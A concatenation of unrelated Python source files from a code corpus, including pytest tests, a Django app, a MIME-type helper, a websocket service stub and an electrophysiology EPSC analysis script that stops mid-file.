import pytest
from programl.util.py import decorators
from tests.test_main import main
class DummyClass(object):
def __init__(self):
self.memoized_property_run_count = 0
@decorators.memoized_property
def memoized_property(self):
self.memoized_property_run_count += 1
# In "real world" usage, this would be an expensive computation who's result
# we would like to memoize.
return 5
def test_memoized_property_value():
"""Test that memoized property returns expected value."""
c = DummyClass()
assert c.memoized_property == 5
def test_memoized_property_run_count():
"""Test that repeated access to property returns memoized value."""
c = DummyClass()
_ = c.memoized_property
_ = c.memoized_property
_ = c.memoized_property
assert c.memoized_property_run_count == 1
def test_timeout_timeout_not_raised():
"""Test that decorated function doesn't raise exception."""
@decorators.timeout(seconds=1)
def Func() -> int:
"""Function under test."""
return 5
assert Func() == 5
def test_timeout_timeout_raised():
"""Test that decorated function doesn't raise exception."""
@decorators.timeout(seconds=1)
def Func() -> int:
"""Function under test."""
time.sleep(10)
return 5
with pytest.raises(TimeoutError):
Func()
if __name__ == "__main__":
main()
| StarcoderdataPython |
4996216 | <reponame>kitawarairon/curso-pyton-engenharia
import time
from intermediario.Clientes import Cliente
from intermediario.Contas import Conta, ContaEspecial
from intermediario.Bancos import Banco
pedro = Cliente('pedro', '77445588', '33344466678')
maria = Cliente('maria', '99885533', '11111111111')
polly = Cliente('pollyana', '99885533', '11111111111')
conta_pedro = Conta(pedro, 500)
conta_maria = Conta(maria, 5000)
conta_polly = ContaEspecial(polly, 2500, 500)
banco_python = Banco('banco python', '003')
banco_python.abrir_conta(conta_pedro)
banco_python.abrir_conta(conta_polly)
banco_python.abrir_conta(conta_maria)
banco_python.lista_contas()
print(banco_python)
| StarcoderdataPython |
1622040 | <gh_stars>1-10
import pytest
from wyrd.constrained_types import (
UnmetConstraintError,
ConstrainedFloat,
add_constraint,
)
@add_constraint(lambda x: x == 3.0, "Pi is exactly 3")
class PiNumber(ConstrainedFloat):
pass
@add_constraint(lambda x: x >= 1.5, "must be greater than or equal to 1.5")
@add_constraint(lambda x: x <= 10, "must be less than or equal to 9.5")
class OneIshToTenIsh(ConstrainedFloat):
pass
def test_its_equal_to_a_float():
assert ConstrainedFloat(3.14159) == 3.14159
def test_it_sums_like_a_float():
assert ConstrainedFloat(5.0) + ConstrainedFloat(1.5) == ConstrainedFloat(6.5)
@pytest.mark.parametrize(
"cls,value",
[(PiNumber, 3), (OneIshToTenIsh, 6.2)],
)
def test_if_a_constraint_is_defined_and_valid_everything_works(cls, value):
assert cls(value) == value
@pytest.mark.parametrize(
"cls,value,expected_error",
[
(PiNumber, 4, "Pi is exactly 3"),
(OneIshToTenIsh, 0.3, "must be greater than or equal to 1.5"),
(OneIshToTenIsh, 10.2, "must be less than or equal to 9.5"),
],
)
def test_if_a_constraint_isnt_met_on_construction_an_exception_is_raised(
cls, value, expected_error
):
with pytest.raises(UnmetConstraintError) as err:
cls(value)
assert str(err.value) == expected_error
| StarcoderdataPython |
9621239 | """
Module for CAS communication using the bottle framework
"""
from client import CASClient, CASMiddleware
| StarcoderdataPython |
3396862 | # pylint: disable=protected-access
from collections import OrderedDict
from inspect import getmembers
from rest_framework.decorators import action
from rest_framework import viewsets as vsets
from ..exceptions import VSTUtilsException
def __get_nested_path(name, arg=None, arg_regexp='[0-9]', empty_arg=True):
path = name
if not arg:
return path
path += '/?(?P<'
path += arg
path += '>'
path += arg_regexp
path += '*' if empty_arg else "+"
path += ')'
return path
def __get_nested_subpath(*args, **kwargs):
sub_path = kwargs.pop('sub_path', None)
path = __get_nested_path(*args, **kwargs)
if sub_path:
path += '/'
path += sub_path
return path
def nested_action(name, arg=None, methods=None, manager_name=None, *args, **kwargs):
# pylint: disable=too-many-locals
list_methods = ['get', 'head', 'options', 'post']
detail_methods = ['get', 'head', 'options', 'put', 'patch', 'delete']
methods = methods or (detail_methods if arg else list_methods)
arg_regexp = kwargs.pop('arg_regexp', '[0-9]')
empty_arg = kwargs.pop('empty_arg', True)
request_arg = kwargs.pop('request_arg', '{}_{}'.format(name, arg))
request_arg = request_arg if arg else None
append_arg = kwargs.pop('append_arg', arg)
sub_options = kwargs.pop('sub_opts', dict())
path = __get_nested_subpath(name, request_arg, arg_regexp, empty_arg, **sub_options)
allow_append = bool(kwargs.pop('allow_append', False))
manager_name = manager_name or name
_nested_args = kwargs.pop('_nested_args', OrderedDict())
_nested_filter_class = kwargs.pop('filter_class', None)
def decorator(func):
def wrapper(view, request, *args, **kwargs):
# Nested name
view.nested_name = name
# Nested parent object
view.nested_parent_object = view.get_object()
# Allow append to nested or only create
view.nested_allow_append = allow_append
# ID name of nested object
view.nested_arg = request_arg
view.nested_append_arg = append_arg
view.nested_id = kwargs.get(view.nested_arg, None)
view.nested_manager = getattr(
view.nested_parent_object, manager_name or name, None
)
view.nested_view_object = None
view._nested_filter_class = _nested_filter_class
return func(view, request, *args)
wrapper.__name__ = func.__name__
kwargs['methods'] = methods
kwargs['detail'] = True
kwargs['url_path'] = path
kwargs['url_name'] = kwargs.pop('url_name', name)
view = action(*args, **kwargs)(wrapper)
view._nested_args = _nested_args
view._nested_manager = manager_name or name
view._nested_filter_class = _nested_filter_class
if arg:
view._nested_args[name] = request_arg
return view
return decorator
class BaseClassDecorator(object):
def __init__(self, name, arg, *args, **kwargs):
self.name = name
self.arg = arg
self.request_arg = kwargs.pop('request_arg', '{}_{}'.format(self.name, self.arg))
self.args = args
self.kwargs = kwargs
def setup(self, view_class): # nocv
raise NotImplementedError()
def __call__(self, view_class):
return self.decorator(view_class)
def decorator(self, view_class):
return self.setup(view_class)
class nested_view(BaseClassDecorator): # pylint: disable=invalid-name
filter_subs = ['filter',]
class NoView(VSTUtilsException):
msg = 'Argument "view" must be installed for `nested_view` decorator.'
def __init__(self, name, arg=None, methods=None, *args, **kwargs):
self.view = kwargs.pop('view', None)
self.allowed_subs = kwargs.pop('subs', [])
super(nested_view, self).__init__(name, arg, *args, **kwargs)
self._subs = self.get_subs()
if self.view is None:
raise self.NoView()
self.serializers = self.__get_serializers(kwargs)
self.methods = methods
if self.arg is None:
self.methods = methods or ['get']
self.kwargs['empty_arg'] = self.kwargs.pop('empty_arg', False)
self.kwargs['append_arg'] = self.arg
self.kwargs['request_arg'] = self.request_arg
def __get_serializers(self, kwargs):
serializer_class = kwargs.pop('serializer_class', self.view.serializer_class)
serializer_class_one = kwargs.pop(
'serializer_class_one', getattr(self.view, 'serializer_class_one', None)
) or serializer_class
return (serializer_class, serializer_class_one)
def _get_subs_from_view(self):
# pylint: disable=protected-access
return [
name for name, _ in getmembers(self.view, vsets._is_extra_action)
if name not in self.filter_subs
]
def get_subs(self):
subs = self._get_subs_from_view()
if self.allowed_subs is None:
return []
elif self.allowed_subs:
subs = [sub for sub in subs if sub in self.allowed_subs]
return subs
@property
def serializer(self):
return self.serializers[0]
@property
def serializer_one(self):
return self.serializers[-1]
def get_view(self, name, **options):
# pylint: disable=redefined-outer-name
def nested_view(view_obj, request, *args, **kwargs):
kwargs.update(options)
class NestedView(self.view):
__doc__ = self.view.__doc__
NestedView.__name__ = self.view.__name__
return view_obj.dispatch_nested_view(NestedView, request, *args, **kwargs)
nested_view.__name__ = name
nested_view.__doc__ = self.view.__doc__
nested_view._nested_view = self.view
return name, nested_view
def get_list_view(self, **options):
return self.get_view('{}_list'.format(self.name), **options)
def get_detail_view(self, **options):
return self.get_view('{}_detail'.format(self.name), **options)
def get_sub_view(self, sub, **options):
return self.get_view('{}_{}'.format(self.name, sub), nested_sub=sub, **options)
def get_decorator(self, detail=False, **options):
args = [self.name]
args += [self.arg] if detail else []
args += self.args
kwargs = dict(self.kwargs)
kwargs['methods'] = self.methods
kwargs['serializer_class'] = self.serializer_one if detail else self.serializer
kwargs['filter_class'] = getattr(self.view, 'filter_class', [])
kwargs.update(options)
return nested_action(*args, **kwargs)
def decorated_list(self):
name, view = self.get_list_view()
return name, self.get_decorator(
url_name='{}-list'.format(self.name), suffix='List'
)(view)
def decorated_detail(self):
name, view = self.get_detail_view()
return name, self.get_decorator(
True, url_name='{}-detail'.format(self.name)
)(view)
def _get_decorated_sub(self, sub):
name, subaction_view = self.get_sub_view(sub)
sub_view = getattr(self.view, sub)
sub_path = sub_view.url_path
decorator = self.get_decorator(
detail=sub_view.detail,
sub_opts=dict(sub_path=sub_path),
methods=sub_view.bind_to_methods or self.methods,
serializer_class=sub_view.kwargs.get('serializer_class', self.serializer),
url_name='{}-{}'.format(self.name, sub_view.url_name),
_nested_args=getattr(sub_view, '_nested_args', OrderedDict())
)
return name, decorator(subaction_view)
def generate_decorated_subs(self):
for sub in self._subs:
yield self._get_decorated_sub(sub)
def setup(self, view_class):
if self.arg:
setattr(view_class, *self.decorated_detail())
view_class._nested_args = getattr(view_class, '_nested_args', OrderedDict())
view_class._nested_args[self.name] = self.request_arg
if self._subs:
for sub_action_name, sub_action_view in self.generate_decorated_subs():
setattr(view_class, sub_action_name, sub_action_view)
setattr(view_class, *self.decorated_list())
return view_class
| StarcoderdataPython |
366141 | <filename>diary/migrations/0001_initial.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Diary',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('name', models.CharField(max_length=100)),
('description', models.CharField(max_length=500, null=True, blank=True)),
('update', models.DateTimeField(default=django.utils.timezone.now)),
('timestamp', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name_plural': 'Diaries',
},
),
migrations.CreateModel(
name='Entry',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('title', models.CharField(max_length=100)),
('body', models.TextField()),
('update', models.DateTimeField(auto_now=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('diary', models.ForeignKey(to='diary.Diary')),
],
options={
'verbose_name_plural': 'Entries',
},
),
]
| StarcoderdataPython |
299570 | """
Direct ports of Julia's `nextprod` [1], with helper function `nextpow` [2],
which are in Julia 1.2.0.
[1] https://github.com/JuliaLang/julia/blob/c6da87ff4bc7a855e217856757ad3413cf6d1f79/base/combinatorics.jl#L248-L262
[2] https://github.com/JuliaLang/julia/blob/c6da87ff4bc7a855e217856757ad3413cf6d1f79/base/intfuncs.jl#L334-L356
This derivative work is licensed under the MIT License, the same license as Julia Base.
"""
from typing import List
import math
def nextpow(a: float, x: float) -> float:
"""The smallest `a^n` not less than `x`, where `n` is a non-negative integer.
`a` must be greater than 1, and `x` must be greater than 0.
# Examples
```jldoctest
julia> nextpow(2, 7)
8
julia> nextpow(2, 9)
16
julia> nextpow(5, 20)
25
julia> nextpow(4, 16)
16
```
"""
assert x > 0 and a > 1
if x <= 1:
return 1.0
n = math.ceil(math.log(x, a))
p = a**(n - 1)
return p if p >= x else a**n
def nextprod(a: List[int], x: int) -> int:
"""Next integer greater than or equal to `x` that can be written as ``\\prod k_i^{a_i}`` for integers
``a_1``, ``a_2``, etc.
# Examples
```jldoctest
julia> nextprod([2, 3], 105)
108
julia> 2^2 * 3^3
108
```
"""
k = len(a)
v = [1] * k # current value of each counter
mx = [nextpow(ai, x) for ai in a] # maximum value of each counter
v[0] = mx[0] # start at first case that is >= x
p = mx[0] # initial value of product in this case
best = p
icarry = 1
while v[-1] < mx[-1]:
if p >= x:
best = p if p < best else best # keep the best found yet
carrytest = True
while carrytest:
p = p // v[icarry - 1]
v[icarry - 1] = 1
icarry += 1
p *= a[icarry - 1]
v[icarry - 1] *= a[icarry - 1]
carrytest = v[icarry - 1] > mx[icarry - 1] and icarry < k
if p < x:
icarry = 1
else:
while p < x:
p *= a[0]
v[0] *= a[0]
return int(mx[-1] if mx[-1] < best else best)
| StarcoderdataPython |
11237313 | <reponame>celioroberto06/cursopythonexercicios
print('-' * 15)
print('LOJA O BARATÃO')
print('-' * 15)
total_compra = mais_caro = mais_barato = nome_barato = 0
perg = cont = 0
while True:
nome = str(input('Nome do produto: '))
preco = float(input('Preço: R$'))
total_compra += preco
cont += 1
if preco > 1000:
mais_caro += 1
if cont == 1 or preco < mais_barato:
mais_barato = preco
nome_barato = nome
perg = ' '
while perg not in 'SN':
perg = str(input('Quer continuar? [S / N]')).upper().strip()[0]
if perg == 'N':
print('-----FIM DO PROGRAMA-----')
break
print(f'O total da compra foi de {total_compra:.2f}')
print(f'Temos {mais_caro} produtos custando mais de R$ 1000.00')
print(f'O produto mais barato foi {nome_barato} que custa R${mais_barato:.2f}')
| StarcoderdataPython |
5035015 | # -*- coding: utf-8 -*-
#
# Copyright 2010 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TyphoonAE's WebSocket service stub."""
from typhoonae import websocket
from typhoonae.websocket import websocket_service_pb2
import google.appengine.api.apiproxy_stub
import httplib
import os
import re
__all__ = [
'Error',
'ConfigurationError',
'WebSocketServiceStub'
]
class Error(Exception):
"""Base websocket error type."""
class ConfigurationError(Error):
"""Raised when environment is not correctly configured."""
class WebSocketServiceStub(google.appengine.api.apiproxy_stub.APIProxyStub):
"""TyphoonAE's WebSocket service stub."""
def __init__(self, host, port=8888, service_name='websocket'):
"""Constructor.
Args:
service_name: Service name expected for all calls.
port: Port number of the Web Socket service.
"""
super(WebSocketServiceStub, self).__init__(service_name)
self._host = host
self._port = port
def _GetAddress(self):
"""Returns service address."""
return "%s:%s" % (self._host, self._port)
@staticmethod
def _GetEnviron(name):
"""Helper method ensures environment configured as expected.
Args:
name: Name of environment variable to get.
Returns:
Environment variable associated with name.
Raises:
ConfigurationError if required environment variable is not found.
"""
try:
return os.environ[name]
except KeyError:
raise ConfigurationError('%s is not set in environment.' % name)
def _Dynamic_CreateWebSocketURL(self, request, response):
"""Implementation of WebSocketService::create_websocket_url().
Args:
request: A fully initialized CreateWebSocketURLRequest instance.
response: A CreateWebSocketURLResponse instance.
"""
url_parts = dict(
protocol='ws',
host=self._GetEnviron('SERVER_NAME'),
port=self._port,
success_path=re.sub('^/', '', request.success_path))
response.url = websocket.WEBSOCKET_HANDLER_URL % url_parts
def _SendMessage(self, body, socket, broadcast=False):
"""Sends a Web Socket message.
Args:
body: The message body.
socket: A socket.
broadcast: This flag determines whether a message should be sent to
all active sockets but the sender.
"""
if broadcast: path = 'broadcast'
else: path = 'message'
conn = httplib.HTTPConnection(self._GetAddress())
headers = {websocket.WEBSOCKET_HEADER: str(socket),
'X-TyphoonAE-ServerName': self._GetEnviron('SERVER_NAME'),
'Content-Type': 'text/plain'}
try:
conn.request("POST", '/'+path, body.encode('utf-8'), headers)
except:
status = websocket_service_pb2.WebSocketMessageResponse.OTHER_ERROR
finally:
conn.close()
status = websocket_service_pb2.WebSocketMessageResponse.NO_ERROR
return status
def _Dynamic_SendMessage(self, request, response):
"""Implementation of WebSocketService::send_message().
Args:
request: A WebSocketMessageRequest instance.
response: A WebSocketMessageResponse instance.
"""
status = self._SendMessage(
request.message.body, request.message.socket)
response.status.code = status
def _Dynamic_BroadcastMessage(self, request, response):
"""Implementation of WebSocketService::broadcast_message().
Args:
request: A WebSocketMessageRequest instance.
response: A WebSocketMessageResponse instance.
"""
status = self._SendMessage(
request.message.body, None, broadcast=True)
response.status.code = status
| StarcoderdataPython |
8002143 | from django.shortcuts import render
from .models import Purchase
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.urls import reverse_lazy
from django.shortcuts import get_object_or_404
from django.http import HttpResponse
#from .tasks import sleepy, send_to_sender
class PurchaseListView(LoginRequiredMixin,ListView):
model = Purchase
template_name = 'purchases/purchases_list.html'
ordering = ['-created']
purchase = Purchase.objects.all()
context_object_name = 'purchases'
def get_context_data(self, *args, **kwargs):
context = super(PurchaseListView, self).get_context_data(*args, **kwargs)
return context
purchase_list_view = PurchaseListView.as_view()
class PurchaseDetailView(LoginRequiredMixin, DetailView):
model = Purchase
template_name = 'purchasess/purchases_detail.html'
purchase_detail_view = PurchaseDetailView.as_view()
class PurchaseCreateView(LoginRequiredMixin,CreateView):
model = Purchase
template_name = 'carts/carts_form.html'
fields = ['pk', 'purchases', 'buyer', 'sellers', 'purchases_price', 'created']
purchase_create_view = PurchaseCreateView.as_view()
class PurchaseUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Purchase
#template_name = 'products/product_form.html'
fields = ['pk', 'purchases', 'buyer', 'sellers', 'purchases_price', 'created']
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
def test_func(self):
purchase = self.get_object()
if self.request.user == purchase.user:
return True
return False
purchase_update_view = PurchaseUpdateView.as_view()
class PurchaseDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Purchase
# template_name = 'products/product_form.html'
success_url = reverse_lazy('purchase_list')
def test_func(self):
purchase = self.get_object()
if self.request.user == purchase.user:
return True
return False
purchase_delete_view = PurchaseDeleteView.as_view()
| StarcoderdataPython |
205554 | #-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from os import path
import re
from bes.compat.map import map
from bes.system.execute import execute
from bes.key_value.key_value_list import key_value_list
from bes.text.text_line_parser import text_line_parser
from bes.common.algorithm import algorithm
class file_mime_type_unix_file_exe(object):
'Detect mime types using the file utility on unix.'
@classmethod
def mime_type(clazz, filename):
cmd = 'file --brief --mime %s' % (filename)
if not path.isfile(filename):
raise IOError('file not found: "{}"'.format(filename))
rv = execute.execute(cmd, raise_error = False)
if rv.exit_code != 0:
return ( None, None )
text = rv.stdout.strip()
return clazz._parse_file_output(text)
@classmethod
def _parse_file_output(clazz, text):
'Parse the output of file --brief --mime {filename}'
lines = text_line_parser.parse_lines(text, strip_text = True, remove_empties = True)
if len(lines) == 1:
return clazz._parse_non_fat_file_output_line(lines[0])
entries = [ clazz._parse_fat_file_output_line(line) for line in lines ]
entries = [ entry for entry in entries if entry ]
entries = algorithm.unique(entries)
if len(entries) == 1:
return entries[0]
return entries
@classmethod
def _parse_non_fat_file_output_line(clazz, line):
'Parse one line of output from file --brief --mime {filename} for non fat failes'
parts = line.split(';')
parts = [ part.strip() for part in parts if part.strip() ]
mime_type = None
values = key_value_list()
if len(parts) > 0:
mime_type = parts.pop(0).strip()
for part in parts:
values.extend(key_value_list.parse(part, delimiter = '='))
values.remove_dups()
kv = values.find_by_key('charset')
charset = kv.value if kv else None
return ( mime_type, charset )
@classmethod
def _parse_fat_file_output_line(clazz, line):
'Parse one line of output from file --brief --mime {filename} for fat files'
r = re.findall(r'^.*\s\(for\sarchitecture\s(.+)\)\:\s+(.*)$', line)
if len(r) == 1:
arch, text = r[0]
return clazz._parse_non_fat_file_output_line(text)
assert len(r) == 0
return None
| StarcoderdataPython |
9629528 | def calculate(n, summ):
if n <= 1:
return n
summ += calculate(n//2, summ)
summ += n%2
return summ
print(calculate(7, 0)) | StarcoderdataPython |
9602373 | import api
class MpAwsEks:
policies = [
api.AcceptLink(filters=[
api.f.endpoint("app", "kube-system.kube.kube-proxy"),
api.f.type("NAE"),
api.f.endpoint("process", "kube-proxy", who="client"),
api.f.endpoint("dns_pattern", ":.*\.eks\.amazonaws\.com:", who="server"),
], changes=[
("server", "dns_pattern", ":.*\.eks\.amazonaws\.com:"),
]),
api.AcceptLink(filters=[
api.f.same_zone,
api.f.endpoint("process", ["grpc-health-probe", "aws-cni"], who="client"),
api.f.endpoint("process", "aws-k8s-agent", who="server"),
], changes=[
]),
api.AcceptLink(filters=[
api.f.endpoint("process", "aws-k8s-agent", who="client"),
api.f.endpoint("dns_pattern", ":ec2.us-west-2.amazonaws.com:"),
], changes=[
("server", "dns_pattern", ":ec2\..*\.amazonaws\.com:"),
]),
]
print("Adding meta-policies to runner")
api.mpr.add(MpAwsEks)
| StarcoderdataPython |
1771854 | ################################################################################################################################################################
# @project Open Space Toolkit ▸ Core
# @file bindings/python/test/types/test_integer.py
# @author <NAME> <<EMAIL>>
# @license Apache License 2.0
################################################################################################################################################################
import pytest
from ostk.core.containers import *
################################################################################################################################################################
def test_array_set ():
# int
int_array_list = set_int_array([1, 2, 3])
int_array_tuple = set_int_array((1, 2, 3))
# double
double_array_list = set_double_array([1.0, 2.0, 3.0])
double_array_tuple = set_double_array((1.0, 2.0, 3.0))
# Integer
integer_array_list = set_integer_array([1, 2, 3])
integer_array_tuple = set_integer_array((1, 2, 3))
# Real
integer_array_list = set_integer_array([1, 2, 3])
integer_array_tuple = set_integer_array((1, 2, 3))
# String
string_array_list = set_string_array(['abc', 'def', 'ghi'])
string_array_tuple = set_string_array(('abc', 'def', 'ghi'))
def test_array_get ():
int_array = [i for i in get_int_array()]
double_array = [i for i in get_double_array()]
integer_array = [i for i in get_integer_array()]
real_array = [i for i in get_real_array()]
string_array = [i for i in get_string_array()]
################################################################################################################################################################
| StarcoderdataPython |
8104041 | # -*- coding: utf-8 -*-
"""
Created 5 March 2019
epsc_peak_x.y.z.py
"""
# from __main__ import *
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import elephant
from neo.io import IgorIO
import os
from collections import OrderedDict
import math
def get_metadata(file, data_notes):
'''Takes a filename and parses it for metadata, and returns metadata in an
orderedDict as a pandas DataFrame for saving later
Also takes information from the cell spreadsheet in data_notes'''
# pull out cell id, cell number, date and condition
file_split = file.split('_')
cell_id = file_split[0]+'_'+file_split[1]
cell_num = cell_id[-1:]
date = '20'+cell_id[2:4]+'-'+cell_id[4:6]+'-'+cell_id[6:8]
if 'drug' in file:
condition = 'TTX+4-AP'
else:
condition = 'control'
# grab metadata from data notes spreadsheet
file_data = data_notes[data_notes['Cell name'] == file]
cell_path = file_data['File Path'].tolist()[0]
genotype = file_data['Genotype'].tolist()[0]
cell_type = file_data['Cell type'].tolist()[0]
depol_sweep_start = file_data['Depol sweeps start'].tolist()[0]
depol_sweep_stop = file_data['Depol sweeps stop'].tolist()[0]
# save metadate into orderedDict pandas DataFrame
dict = OrderedDict()
dict['Date'] = date
dict['Cell ID'] = cell_id
dict['Cell Number'] = cell_num
dict['Cell Path'] = cell_path
# dict['Condition'] = condition
dict['Genotype'] = genotype
dict['Cell Type'] = cell_type
dict['Exclude Sweep Start'] = depol_sweep_start
dict['Exclude Sweep Stop'] = depol_sweep_stop
metadata = pd.DataFrame(dict, index=range(1))
return metadata
def igor_to_pandas(file, data_dir):
'''This function opens an igor binary file (.ibw), extracts the time
series data, and returns a pandas DataFrame'''
file_path = os.path.join(data_dir, file)
data_raw = IgorIO(filename=file_path)
data_neo = data_raw.read_block()
data_neo_array = data_neo.segments[0].analogsignals[0]
data_df = pd.DataFrame(data_neo_array.as_array())
return data_df
def mean_baseline(data, stim_time, pre_stim=100, sf=10):
'''
Find the mean baseline in a given time series
Parameters
----------
data: pandas.Series or pandas.DataFrame
The time series data for which you want a baseline.
stim_time: int or float
The time in ms when stimulus is triggered.
pre_stim: int or float
Time in ms before the stimulus trigger over which baseline is measured.
sf: int or float
The sampling frequency in kHz.
Returns
-------
baseline: float or pandas.Series
The mean baseline over the defined window
'''
start = (stim_time - pre_stim) * sf
stop = (stim_time - 1) * sf
window = data.iloc[start:stop]
baseline = window.mean()
return baseline
def epsc_peak(data, baseline, stim_time, polarity='-', post_stim=100, sf=10):
'''
Find the peak EPSC value for a pandas.Series or for each sweep (column) of
a pandas.DataFrame. This finds the absolute peak value of mean baseline
subtracted data.
Parameters:
-----------
data: pandas.Series or pandas.DataFrame
Time series data with stimulated synaptic response triggered at the
same time for each sweep.
baseline: scalar or pandas.Series
Mean baseline values used to subtract for each sweep.
stim_time: int or float
Time in ms at which stimulus is triggered each sweep.
polarity: str
The expected polarity of the EPSC; negative: '-'; postitive: '+'.
Default is '-'.
post_stim: int or float
Time in ms that marks the end of the sampling window post stimulus.
Default is 100 ms.
sf: int or float
The sampling frequency in kHz. Default is 10 kHz.
Returns
-------
epsc_peaks: pandas.Series
The absolute peak of mean baseline subtracted time series data.
'''
subtracted_data = data - baseline
start = stim_time * sf
end = (stim_time + post_stim) * sf
peak_window = subtracted_data.iloc[start:end]
if polarity == '-':
epsc_peaks = peak_window.min()
elif polarity == '+':
epsc_peaks =peak_window.max()
else:
raise ValueError(
"polarity must either be + or -"
)
return epsc_peaks
def series_resistance(data, tp_start, vm_jump, sf=10):
'''
Calculate the approximate series resistance (Rs) from a test pulse (tp).
Parameters
----------
data: pandas.Series or pandas.DataFrame
Raw time series daata of the v-clamp recording in nA.
tp_start: int or float
Time in ms when test pulse begins.
vm_jump: int or float
Amplitude ofwhatever windows needs here the test pulse voltage command in mV..
sf: int or float
Sampling frequency in kHz. Default is 10 kHz.
Returns:
rs: pandas.Series of float
The series resistance for each sweep in MOhms.
'''
# find the baseline 10 ms pre test pulse and subtract from raw data
rs_baseline = mean_baseline(data, stim_time=tp_start, pre_stim=11)
rs_subtracted = data - rs_baseline
# set up indices for starting and ending peak window
start = tp_start * sf
end = (tp_start + 2) * sf
rs_window = rs_subtracted.iloc[start:end]
if vm_jump > 0:
rs_peak = rs_window.max()
else:
rs_peak = rs_window.min()
# calculate Rs via V=IR -> Rs = V/I
rs = ((vm_jump * 10**-3) / (rs_peak * 10**-9)) * 10**-6
return rs
''' *********************************************************************** '''
''' ################## Define file structure on server #################### '''
# home_dir will depend on the OS, but the rest will not
# query machine identity and set home_dir from there
machine = os.uname()[0]
if machine == 'Darwin':
home_dir = '/Volumes/Urban'
elif machine == 'Linux':
home_dir = '/run/user/1000/gvfs/smb-share:server=172.16.17.32,share=urban'
else:
home_dir = os.path.join('Z:', os.sep)
project_dir = os.path.join(home_dir, 'Huang', 'OSN_OMPvGg8_MTC')
figure_dir = os.path.join(project_dir, 'figures')
table_dir = os.path.join(project_dir, 'tables')
data_dir = os.path.join(project_dir, 'data')
''' ## Open the notes spreadsheet and parse for what we want to analyze ## '''
# open metadata file
data_notes = pd.read_csv(os.path.join(table_dir, 'OSN_Gg8vOMP.csv'))
# pull out cell_id for directory, file name, and make the full path
file_name_list = data_notes['Cell name'].tolist()
cell_id_list = []
for file in file_name_list:
file_split = file.split('_')
cell_id = file_split[0]+'_'+file_split[1]
cell_id_list.append(cell_id)
file_path_list = []
for cell, file in zip(cell_id_list, file_name_list):
file_path = os.path.join(cell, file + '.ibw')
file_path_list.append(file_path)
data_notes = pd.concat([pd.DataFrame({'File Path': file_path_list}), data_notes], axis=1)
# drop cells that didn't save to igor
noigor_list = np.array(data_notes[data_notes['Igor saved?'] == 'No'].index)
data_notes = data_notes.drop(index=noigor_list)
# drop cells that don't have any # of drug sweeps
nodrug_list = np.array(data_notes[data_notes['# of drug sweeps'].isnull() == True].index)
data_notes = data_notes.drop(index=nodrug_list)
# update file name list to have only files you want to analyze after logic
file_name_list = data_notes['Cell name'].tolist()
''' ##########################################################################
This is all the analysis, figures, saving
Read in file metadata, open file from igor, convert to pandas
##############################################################################
'''
# loop through all the files in file_name_list for plots and saving
for file_name in file_name_list:
# set file name from list
file = file_name
# gather metadata and set some key parameters for use later on in loop
metadata = get_metadata(file, data_notes)
file_path = metadata['Cell Path'][0]
cell_id = metadata['Cell ID'][0]
genotype = metadata['Genotype'][0]
exclude_start = metadata['Exclude Sweep Start'][0]
exclude_stop = metadata['Exclude Sweep Stop'][0]
# open igor file and convert to pandas
data = igor_to_pandas(file_path, data_dir)
# process logic and build exclude sweeps list from metadata, and exclude sweeps
if math.isnan(exclude_start) is False:
# need to pull out the end of the excluded sweeps
# if all sweeps after start are excluded
if math.isnan(exclude_stop) is True:
data = data.iloc[:, :int(exclude_start)]
# else only exclude traces in between start and stop
else:
begin = data.iloc[:, :int(exclude_start)]
end = data.iloc[:, int(exclude_stop):]
data = pd.concat([begin, end], axis=1)
else:
pass
'''
Pull out EPSC peak from unfiltered signals
Baseline 100 ms preceding blue light
Peak within 250 ms of blue light
'''
baseline = mean_baseline(data, 500)
peaks = epsc_peak(data, baseline, 500)
'''
Pull out EPSC peaks from filtered signals
Baseline 100 ms preceding blue light
Peak within 250 ms of blue light
'''
# filter signal with butterworth filter at 500 Hz for data
filt_data = elephant.signal_processing.butter(data.T,
lowpass_freq=500.0,
fs=10000.0)
filt_data = pd.DataFrame(filt_data).T
filt_baseline = mean_baseline(filt_data, 500)
filt_peaks = epsc_peak(filt_data, filt_baseline, 500)
''' Calculating Series Resistance (rs) from test pulse (tp) '''
rs = series_resistance(data, 50, -5)
''' Plot EPSC peaks and Rs over time of experiemnt '''
# set up index markers for data | drug line and drug stimuli
# pull out number of sweeps for both conditions and all
n_control_sweeps = len(peaks)
# set up auto y max for peak plots (min since negative)
y_min = peaks.min()
y_min_lim = y_min * 1.15 * 1000
# set up logic for Rs y scaling: if < 20 MOhms, don't scale, if > scale
if rs.max() <= 20:
rs_y_min = 0
rs_y_max = 20
else:
rs_y_min = rs.min() * 0.5
rs_y_max = rs.max() * 1.2
# make a figure with 2 plots
fig, axs = plt.subplots(2, 2, figsize=(6, 6), constrained_layout=True)
fig.suptitle('Summary for ' + genotype + ' ' + cell_id)
# optional for plotting unfiltered on same graph for comparison
axs[0, 0].plot(peaks*1000, marker='.', color='darkgray', linestyle='', label='raw')
# plot the filterd peak currents NOTE: convert peak values to pA
axs[0, 0].plot(filt_peaks*1000, color='k', marker='.', linestyle='', label='filtered')
axs[0, 0].set_xlabel('Stimulus Number')
axs[0, 0].set_ylabel('EPSC Peak (pA)')
axs[0, 0].set_ylim(0, y_min_lim)
axs[0, 0].legend()
# plot the series resistance values
